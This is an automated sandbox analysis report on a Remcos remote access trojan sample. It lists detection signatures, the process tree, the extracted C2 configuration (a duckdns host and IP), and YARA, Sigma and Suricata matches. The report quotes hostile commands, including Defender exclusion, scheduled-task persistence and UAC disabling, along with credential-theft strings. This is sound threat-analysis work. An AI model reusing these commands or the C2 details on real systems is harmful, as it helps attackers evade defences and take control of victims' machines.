Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
Analysis ID:1518542
MD5:64219e1931808919fd05dcfb458dfc25
SHA1:6adb1561418be08ccaa2e448166bc36673ec60c5
SHA256:ceebb7ca5adbb69127cbf5205e49840c4846cb46e4c5ac568557e7bdf9fe315c
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
    • powershell.exe (PID: 4208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5380 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ZRuVeAoBoxootS.exe (PID: 5584 cmdline: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe MD5: 64219E1931808919FD05DCFB458DFC25)
    • schtasks.exe (PID: 4908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ZRuVeAoBoxootS.exe (PID: 4944 cmdline: "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
    • ZRuVeAoBoxootS.exe (PID: 4680 cmdline: "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "127.0.0.1:52121:1officerem.duckdns.org:52121:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-6GPUH1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x691e0:$a1: Remcos restarted by watchdog!
        • 0x69738:$a3: %02i:%02i:%02i:%03i
        • 0x69abd:$a4: * Remcos v
        00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6320c:$str_b2: Executing file:
        • 0x64328:$str_b3: GetDirectListeningPort
        • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x63e30:$str_b7: \update.vbs
        • 0x63234:$str_b9: Downloaded file:
        • 0x63220:$str_b10: Downloading file:
        • 0x632c4:$str_b12: Failed to upload file:
        • 0x642f0:$str_b13: StartForward
        • 0x64310:$str_b14: StopForward
        • 0x63dd8:$str_b15: fso.DeleteFile "
        • 0x63d6c:$str_b16: On Error Resume Next
        • 0x63e08:$str_b17: fso.DeleteFolder "
        • 0x632b4:$str_b18: Uploaded file:
        • 0x63274:$str_b19: Unable to delete:
        • 0x63da0:$str_b20: while fso.FileExists("
        • 0x63749:$str_c0: [Firefox StoredLogins not found]
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        16.2.ZRuVeAoBoxootS.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          16.2.ZRuVeAoBoxootS.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          16.2.ZRuVeAoBoxootS.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          16.2.ZRuVeAoBoxootS.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 20 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe, ParentImage: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe, ParentProcessId: 5584, ParentProcessName: ZRuVeAoBoxootS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", ProcessId: 4908, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", ProcessId: 5380, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", ProcessId: 5380, ProcessName: schtasks.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: CD B5 9A 92 47 8D A0 C9 DB A5 E5 62 61 1B 8F D2 87 BC FF 6B 8B 9D FE A1 34 0F 60 20 81 1F 4C 8F 77 59 C1 AE 37 0D 48 33 31 B3 8F E8 C4 BF 48 15 DC F2 8E A0 2C 9F D4 A3 81 43 75 2C 6E 00 46 32 08 C6 F5 2D 0C 5C EF 5F 40 C0 09 D0 C6 24 FB E2 B4 FD 18 41 AA BE 1A C4 88 26 89 82 87 33 A8 D9 EE 7A 86 E4 C6 B3 DC 63 DA 9C 68 CF FC 15 4C 90 53 F3 E5 0F 62 98 12 5C 33 8F 5A F7 20 64 20 BB FA E1 BC 9C CA 15 2E 43 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessId: 5292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-6GPUH1\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T19:45:42.434528+020020365941Malware Command and Control Activity Detected192.168.2.949709103.186.116.14552121TCP
            2024-09-25T19:49:02.169178+020020365941Malware Command and Control Activity Detected192.168.2.949719103.186.116.14552121TCP
            2024-09-25T19:49:02.450423+020020365941Malware Command and Control Activity Detected192.168.2.949720103.186.116.14552121TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T19:45:46.455735+020028033043Unknown Traffic192.168.2.949712178.237.33.5080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "127.0.0.1:52121:1officerem.duckdns.org:52121:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-6GPUH1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeReversingLabs: Detection: 21%
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeReversingLabs: Detection: 21%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,16_2_004315EC
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_77a1306a-a
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wGsy.pdb source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: Binary string: wGsy.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,16_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_0040838E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_004087A0
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,16_2_00407848
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004068CD FindFirstFileW,FindNextFileW,16_2_004068CD
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0044BA59 FindFirstFileExA,16_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,16_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,16_2_00406D28

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49719 -> 103.186.116.145:52121
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49709 -> 103.186.116.145:52121
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49720 -> 103.186.116.145:52121
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 127.0.0.1
            Uses dynamic DNS services
            Source: unknownDNS query: name: officerem.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.9:49709 -> 103.186.116.145:52121
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49712 -> 178.237.33.50:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,16_2_0041936B
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: officerem.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
